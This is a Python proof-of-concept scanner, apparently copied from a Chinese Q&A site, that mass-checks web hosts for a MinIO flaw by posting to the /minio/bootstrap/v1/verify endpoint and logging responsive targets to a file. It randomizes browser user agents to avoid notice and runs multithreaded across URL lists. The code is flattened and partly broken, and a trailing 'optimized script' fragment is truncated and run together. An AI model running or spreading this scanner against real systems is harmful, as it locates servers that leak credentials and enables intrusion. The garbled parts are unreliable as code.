import requests import sys import urllib3 from argparse import ArgumentParser import concurrent.futures from urllib import parse from time import time import random

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) filename = sys.argv[1] url_list=[]

def get_ua(): first_num = random.randint(55, 62) third_num = random.randint(0, 3200) fourth_num = random.randint(0, 140) os_type = [ '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', '(Macintosh; Intel Mac OS X 10_12_6)' ] chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)

ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36',
               '(KHTML, like Gecko)', chrome_version, 'Safari/537.36']
              )
return ua

proxies={'http': 'http://127.0.0.1:7890', 'https': 'https://127.0.0.1:7890'}

def write_targets(vurl, filename): with open(filename, "a+") as f: f.write(vurl + "\n")

#poc def check_url(url): url=parse.urlparse(url) hostname = url.hostname url=url.scheme + '://' + url.netloc vulnurl=url + "/minio/bootstrap/v1/verify" headers = { 'User-Agent': get_ua(), "host":hostname, "Content-Type": "application/x-www-form-urlencoded" } data="" try: res = requests.post(vulnurl, verify=False, allow_redirects=False, headers=headers,data=data ,timeout=5) if res.status_code == 200 and "MinioEn" in res.text: # print(res.text) print("\033[32m[+]{} is vulnerable\033[0m".format(url)) write_targets(vulnurl,"vuln.txt") else: print("\033[34m[-]{} not vulnerable.\033[0m".format(url)) except Exception as e: print("\033[34m[!]{} request false.\033[0m".format(url)) pass

#多线程 def multithreading(url_list, pools=10): with concurrent.futures.ThreadPoolExecutor(max_workers=pools) as executor: executor.map(check_url, url_list)

if name == 'main': arg=ArgumentParser(description='check_url By m2') arg.add_argument("-u", "--url", help="Target URL; Example:http://ip:port") arg.add_argument("-f", "--file", help="Target URL; Example:url.txt") args=arg.parse_args() url=args.url filename=args.file print("[+]任务开始.....") start=time() if url != None and filename == None: check_url(url) elif url == None and filename != None: for i in open(filename): i=i.replace('\n','') url_list.append(i) multithreading(url_list,10) end=time() print('任务完成,用时%ds.' %(end-start)

优化脚本:import requestsimport sysimport urllib3from argparse import ArgumentParserimport threadpoolfrom urllib import parsefrom time import timeimport random#app=miniourllib3disable_warningsurllib3except

原文地址: http://www.cveoy.top/t/topic/h1Ez 著作权归作者所有。请勿转载和采集!

免费AI点我,无需注册和登录